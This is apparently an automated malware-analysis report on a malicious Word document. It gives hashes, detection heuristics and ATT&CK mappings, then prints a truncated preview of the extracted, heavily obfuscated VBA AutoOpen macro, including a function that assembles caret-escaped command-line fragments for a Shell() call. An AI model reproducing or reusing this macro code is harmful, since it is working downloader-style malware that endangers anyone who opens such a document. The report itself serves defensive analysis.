Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f75e830a44998cfc…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 149.9 KB
Created: 2018-09-25 07:49:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 6968960cfd622cbc3345be24455a8abd
SHA-1: 50e8bfea8d64e4a69f5a4cccf3a18cf9860126f2
SHA-256: f75e830a44998cfcb588e17103f57edbcae3b64ab366f842403379d2b7897018
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005: Visual Basic
T1204.002: Malicious File

The sample contains a legacy WordBasic AutoOpen macro, a known indicator of malicious documents. The macro uses the Shell() function (the critical-severity heuristic that fired) to execute arbitrary commands. This strongly suggests the document is designed to download and execute a second-stage payload, a common malware delivery technique.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6923105-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923105-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 144341 bytes
SHA-256: a60764157c934ac072cc8e979bda8798f3a504d8e9b13e72e7f51336313ce59e

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "YccAYYw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim TDITmq(1)
TDITmq(0) = MidB(jTEfnHQ + wldYuDCjzjDCZjOVAB + Nwwdwji, 355, 506) + MidB(SjGBY + QFqijmBGHtvhDQcwrHS + JJoOSSf, 799, 739) + MidB(OqfPQru + ZfMzqfYcrwwDJZXjocDIla + lNfANp, 612, 149) + Right(oXmbGNvz + jGsXTpuVWbSFLwriI + vaEzw, 235)
   Dim NmnBjf(2)
NmnBjf(0) = MidB(jCAll + PuTWuQQdniKTOcYfI + blZqnKj, 155, 730) + MidB(FpFcpbZK + NCUDqoXNGzSizEdsk + OXMdO, 731, 759) + Mid(wTcNj + zwskYJnLnusWvnMowrMw + QABNBEw, 842, 358) + Mid(sldEknSa + aKhioBvIkzqAIJmLvADPWtC + MDuXKop, 805, 381)
NmnBjf(1) = Mid(CDjXwu + UuzcIrvWvKolSLwcfLSTSjw + RjSbqROp, 293, 523) + Right(OtTuJqb + mjHSWZCbvMLCdqcUEWjPCwQ + YJqUwAiz, 224) + MidB(sLNkfa + PcSasiVFQEHDCUF + BzrQZd, 531, 871) + Right(kccECWGj + SfYiHOlILQZiFlBBOjl + jbtBE, 637)
   Dim HiwWaI(1)
HiwWaI(0) = MidB(PqlzfKt + lkEijjjSCfuMjbSEJnqds + pAPdViWH, 373, 937) + Right(YzPEL + qCKKiAsMGvGMSjqlhzXE + XctGuji, 463) + MidB(wfqjcc + AXpikHiBaXfSwLYzjSXR + snLqVIFF, 265, 77) + Right(srEzLhEA + wiKVEJrdGHhrrjSSaEuI + jujGqM, 662)
   Dim SYOWaR(2)
SYOWaR(0) = Left(hvJwjlC + wwiVDIbQBFzqCpVjdXRSK + wUWEPGhC, 879) + MidB(cPPmFZ + lrthIqQSPjdTlNLwmzSnIiU + TrSrC, 338, 971)
SYOWaR(1) = MidB(mNOwn + NTzqCEjKdtTElCnwtzoa + OJUjinLV, 5, 901) + MidB(WCPLHO + ftRkaloCpYszDnivqiz + rSGHiipZ, 40, 584)
MObNHzIsOUwjBA (KeyString(cjzDcvWa + LzDDTAm + 0 + 0 + 11 + 10 + 46 + BEaSD + ZkntYTG) + LjOpfi + KHhqjm + KeyString(AFklCNw + VlnoIsts + 0 + 0 + 12 + 11 + 54 + UXsdT + Iwqst) + bIwUdCu + IuzoME + OdLhrkCaB + vojJJGBqYd + MajnTlQkm + bGdvOwUrWC + wLOhXK + kVwraYvXmCt + ZiMoDd + LLaiIjGnv + tNZFc + BEsVTfM + MwYXTI + kGwzWSKV + TPUzcT)
   Dim RwbcFs(2)
RwbcFs(0) = Right(ifWzAp + YdHhhFLzYmDPbaVaUwIw + OSGwFM, 108) + Right(iRuIv + FijFwCHlWfOHkQfSmEZsL + JtRrSZPh, 863)
RwbcFs(1) = Left(VULLKL + qBVRmOuYijmUZEitEFza + OKsHbtNJ, 589) + MidB(obfdYzqw + wvPSwjRirbiiYDBoScqjMEl + fHIciv, 333, 282) + Left(dMwfCwRK + ZWctJOGMDOMhBiwziGo + UcWwnlv, 889) + MidB(qJiPSkhK + aQfuhhSLOAlwhYSTbI + qLppTj, 279, 37)
   Dim hpasHf(2)
hpasHf(0) = MidB(TzwqS + DbYwrLtUXumsNGToZf + wRSQwKXc, 103, 449) + MidB(XEUriD + UNsnsmsWiWnmjYvjizv + wvMImc, 201, 431)
hpasHf(1) = Right(WkZfX + iGbAIfdoSjXMIdqwXiF + zDbOqH, 866) + MidB(LSpNOo + izJbzWwLwobYLHAEDYn + MFBqkL, 280, 56)
   Dim HBBCp(2)
HBBCp(0) = Left(ZapwUSHu + KtEwcYZEYnnKXiFzv + EVCqm, 192) + Mid(IMSuPCYH + ddlLDlvownCwKHitlkOZRQ + kwIwXa, 385, 347)
HBBCp(1) = MidB(tSQvLVC + QInQNNttODTvddjzQc + pYvQdqZs, 445, 345) + MidB(NzhuI + aDNHzoAhpEiinPSZkDTWjB + CMvlpH, 907, 35)
   Dim wGDwbO(2)
wGDwbO(0) = MidB(cjbqFK + kMOraRGtjsswmwMEpVkwDNGf + zFiGcvBn, 84, 223) + Left(JIsWN + mOmGKtUALiUlVzNlUquYA + oLcEhz, 660) + Right(hNwTMHvl + qwfLSObDArqtFJXMd + wWQciuZ, 240) + Left(wawVJ + pYYiorafaHZwvEzI + jOCrEitL, 457)
wGDwbO(1) = Right(INWEGHIQ + zTSNYwirVAFUVnjXz + CKqJC, 881) + Left(rsVokukd + vhjBvDtRkUYsbmsQOhEpui + fVQlJDZ, 47)
   Dim zIksAh(1)
zIksAh(0) = Left(iKEvaR + GNjMBrQPtULLAhsuQaPAXd + WVQfk, 940) + Right(BTUwI + dHMPFcSAhXcCMiuhuO + kOEvjS, 514) + Left(ZZltKOA + CPzMUEOnlBazmbBBivAal + cFUBU, 886) + Right(MiQXt + sKpuLcnziMzwpMbRc + FQHYwZ, 922)
End Sub


Attribute VB_Name = "BPmQlAEcSAt"
Function bIwUdCu()
rZHwwKPoBF = "d" + " " + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "V^" + ":"
LciRSjSmf = "^" + "O" + "N" + CStr(Chr(3 + 6 + 7 + 8 + 23)) + "C" + CStr(Chr(2 + 4 + 5 + 5 + 18)) + "^" + "s^" + "e" + "^" + "t " + "^~"
rkhJYLpswoE = "^" + "{=" + "1^" + "9" + "^" + "0" + "^ " + "^1" + "5^" + "3"
hiSwLCWMJA = " 9" + "^1" + "^5" + " " + "0^" + "3" + "1^"
XNDMAjCG = " ^" + "0" + "^5" + "^" + "9^" + " " + "^5" + "^" + "0"
ctitnXYYz = "9^" + " " + "^" + "19" + "3" + "^" + " " + "5" + "^" + "31"
UiNXZfbjpw = " ^" + "0" + "^3" + "^5" + " 0" + "^9" + "^1" + " 1" + "^" + "0"
tbEdRkHvo = "9^" + " " + "^" + "5" + "^9" + "^1" + " 0" + "^3" + "1" +
... (truncated)